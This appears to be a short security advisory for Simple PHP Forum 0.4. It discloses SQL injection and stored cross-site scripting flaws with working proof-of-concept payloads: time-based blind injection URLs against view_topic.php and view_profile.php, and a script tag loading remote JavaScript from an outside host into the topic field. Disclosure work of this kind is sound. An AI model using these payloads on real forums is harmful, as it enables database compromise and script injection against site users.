# Author: loneferret of Offensive Security # Product: sphpforum # Version: 0.4 (older versions may be affected) # # Software Download: http://sourceforge.net/projects/sphpforum/ # Description: # Simple PHP Forum is a PHP based forum/BBS board is designed to be small, simple, # fast and allow easy integration into any existing web site. # Vulnerability: # Due to improper input sanitation, parameters are prone to SQL injection. Stored # crossed site scripting is also present in some forms. # PoC 1: # SQL Injection # Page: view_topic.php / view_profile.php? # Vulnerable param: 'id' # http://172.16.194.148/sphpforum/sphpforum-0.4/view_topic.php?id=50%27%20and%20sleep%2810%29%20and%20%271%27=%271 # http://172.16.194.148/sphpforum/sphpforum-0.4/view_profile.php?id=loneferret%27%20and%20sleep%2810%29%20and%20%271%27=%271 # PoC 2: # Stored XSS # Page: create_topic.php # Vulnerable field: Topic # Payload: <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>Брой прочитания на тази страница: 1201
sphpforum 0.4 Multiple Vulnerabilities